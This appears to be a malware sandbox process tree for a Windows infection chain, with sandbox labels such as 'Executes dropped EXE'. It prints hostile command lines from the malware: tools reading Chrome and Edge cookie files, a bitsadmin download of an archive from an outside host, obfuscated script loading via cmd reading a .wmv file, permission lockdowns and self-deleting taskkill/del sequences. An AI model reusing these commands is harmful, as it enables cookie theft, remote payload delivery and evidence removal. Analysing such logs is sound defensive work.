                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1532,12164867954002018408,5461179612510239134,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:8
                                                                                                                          9⤵
                                                                                                                            PID:6240
                                                                                                                          • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                                            9⤵
                                                                                                                              PID:6252
                                                                                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x220,0x248,0x7ff72756a890,0x7ff72756a8a0,0x7ff72756a8b0
                                                                                                                                10⤵
                                                                                                                                  PID:6556
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "cmd.exe" /C taskkill /F /PID 5608 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe"
                                                                                                                              8⤵
                                                                                                                                PID:408
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /F /PID 5608
                                                                                                                                  9⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:6416
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "cmd.exe" /C taskkill /F /PID 5608 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe"
                                                                                                                                8⤵
                                                                                                                                  PID:4856
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /F /PID 5608
                                                                                                                                    9⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:6408
                                                                                                                            • C:\Users\Admin\Documents\bver95N2avcKErXNcYfRZRz8.exe
                                                                                                                              "C:\Users\Admin\Documents\bver95N2avcKErXNcYfRZRz8.exe"
                                                                                                                              6⤵
                                                                                                                                PID:4760
                                                                                                                                • C:\Users\Admin\AppData\Roaming\8260730.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\8260730.exe"
                                                                                                                                  7⤵
                                                                                                                                    PID:6748
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\7370478.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\7370478.exe"
                                                                                                                                    7⤵
                                                                                                                                      PID:4492
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                        8⤵
                                                                                                                                          PID:6156
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3078339.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3078339.exe"
                                                                                                                                        7⤵
                                                                                                                                          PID:5620
                                                                                                                                      • C:\Users\Admin\Documents\Xt7_vUxKk0AkGkjHUtAOvRxh.exe
                                                                                                                                        "C:\Users\Admin\Documents\Xt7_vUxKk0AkGkjHUtAOvRxh.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4716
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:3776
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:2560
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:4528
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:1664
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:3232
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                          7⤵
                                                                                                                                            PID:5200
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                            7⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5460
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                            7⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5604
                                                                                                                                        • C:\Users\Admin\Documents\4grjqtdP7ogqSBFJwMkpus9j.exe
                                                                                                                                          "C:\Users\Admin\Documents\4grjqtdP7ogqSBFJwMkpus9j.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:496
                                                                                                                                          • C:\Users\Admin\Documents\4grjqtdP7ogqSBFJwMkpus9j.exe
                                                                                                                                            "C:\Users\Admin\Documents\4grjqtdP7ogqSBFJwMkpus9j.exe"
                                                                                                                                            7⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5136
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              8⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5200
                                                                                                                                        • C:\Users\Admin\Documents\vRBqrhGi6FdIypQNAhbGeKUq.exe
                                                                                                                                          "C:\Users\Admin\Documents\vRBqrhGi6FdIypQNAhbGeKUq.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5112
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:5776
                                                                                                                                          • C:\Users\Admin\Documents\_3YwqLObFBjLEDY5txjW4XMu.exe
                                                                                                                                            "C:\Users\Admin\Documents\_3YwqLObFBjLEDY5txjW4XMu.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:1136
                                                                                                                                            • C:\Users\Admin\Documents\_3YwqLObFBjLEDY5txjW4XMu.exe
                                                                                                                                              "C:\Users\Admin\Documents\_3YwqLObFBjLEDY5txjW4XMu.exe" -a
                                                                                                                                              7⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4232
                                                                                                                                          • C:\Users\Admin\Documents\wLGo4KcuWzauIuzTC0N_ZRn_.exe
                                                                                                                                            "C:\Users\Admin\Documents\wLGo4KcuWzauIuzTC0N_ZRn_.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:608
                                                                                                                                            • C:\Users\Admin\Documents\wLGo4KcuWzauIuzTC0N_ZRn_.exe
                                                                                                                                              "C:\Users\Admin\Documents\wLGo4KcuWzauIuzTC0N_ZRn_.exe"
                                                                                                                                              7⤵
                                                                                                                                                PID:648
                                                                                                                                            • C:\Users\Admin\Documents\ubHE83QRHXgM_BbH6_P0wjkr.exe
                                                                                                                                              "C:\Users\Admin\Documents\ubHE83QRHXgM_BbH6_P0wjkr.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4896
                                                                                                                                            • C:\Users\Admin\Documents\SA0C9MpxhoM_IUwqIORfO9gu.exe
                                                                                                                                              "C:\Users\Admin\Documents\SA0C9MpxhoM_IUwqIORfO9gu.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                              PID:5076
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8A2D.tmp\tempfile.ps1"
                                                                                                                                                7⤵
                                                                                                                                                  PID:2300
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8A2D.tmp\tempfile.ps1"
                                                                                                                                                  7⤵
                                                                                                                                                    PID:5596
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8A2D.tmp\tempfile.ps1"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:5352
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8A2D.tmp\tempfile.ps1"
                                                                                                                                                      7⤵
                                                                                                                                                        PID:4480
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8A2D.tmp\tempfile.ps1"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:5808
                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8A2D.tmp\tempfile.ps1"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:5780
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8A2D.tmp\tempfile.ps1"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:6100
                                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                              "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                                                                              7⤵
                                                                                                                                                              • Download via BitsAdmin
                                                                                                                                                              PID:4944
                                                                                                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pnLBevXQnRnohLuH -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                              7⤵
                                                                                                                                                                PID:3788
                                                                                                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfy5nofGbTcOx4Im -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:5000
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8A2D.tmp\tempfile.ps1"
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:5044
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8A2D.tmp\tempfile.ps1"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:6592
                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8A2D.tmp\tempfile.ps1"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:2996
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8A2D.tmp\tempfile.ps1"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:4664
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8A2D.tmp\tempfile.ps1"
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:3660
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2204
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                        PID:2288
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS06680CB4\sonia_6.exe
                                                                                                                                                                          sonia_6.exe
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                          PID:3744
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:3864
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:3520
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:6980
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 500 -s 440
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:2120
                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:1368
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:2976
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:3584
                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:1820
                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                      PID:1144
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\196B.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\196B.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:5128
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\196B.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\196B.exe
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                      PID:5492
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls "C:\Users\Admin\AppData\Local\2b458347-cc19-49df-ace4-1d0db2d8eb63" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:6064
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\196B.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\196B.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:2692
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\196B.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\196B.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:1400
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\bc165566-540e-4c38-9bbe-fbf407beee84\build2.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\bc165566-540e-4c38-9bbe-fbf407beee84\build2.exe"
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:5864
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\bc165566-540e-4c38-9bbe-fbf407beee84\build2.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\bc165566-540e-4c38-9bbe-fbf407beee84\build2.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:3748
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\bc165566-540e-4c38-9bbe-fbf407beee84\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:5720
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill /im build2.exe /f
                                                                                                                                                                                      8⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:5484
                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                      8⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                      PID:5864
                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                        PID:5348
                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                          PID:5360
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3570.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\3570.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5560
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5712.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\5712.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                        PID:6012
                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5160
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\A0D9.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\A0D9.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4460
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\CEC0.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\CEC0.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:3976
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D2A9.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\D2A9.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:608
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D2A9.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\D2A9.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5496
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DAE7.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\DAE7.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:5644
                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                      cmd /c start c.exe & start l.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4472
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c.exe
                                                                                                                                                                                          c.exe
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:2912
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c cmd < Parlasse.wmv
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:4204
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  cmd
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:344
                                                                                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                      findstr /V /R "^hqVLSBiFVkisDvgANWfHkkgqnFPqUPdvHQlUgqiIGEuNwqJAbhcZzXvwMVhhLiKuVLKNjzkNOHwGyBYbVfCGzdrKzoozMTXmTqRddWgreIkLVQWlWPacEtMEHZxtk$" Ove.wmv
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:6136
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                        Puramente.exe.com m
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:1300
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:1904
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:5788
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                      PID:2972
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:6956
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                              PID:5732
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                  PID:5288
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                      ping GFBFPSXA -n 30
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                      PID:4788
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\l.exe
                                                                                                                                                                                                                l.exe
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4272
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\E2E7.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\E2E7.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5536
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im E2E7.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E2E7.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5748
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                      taskkill /im E2E7.exe /f
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:1236
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                      PID:7024
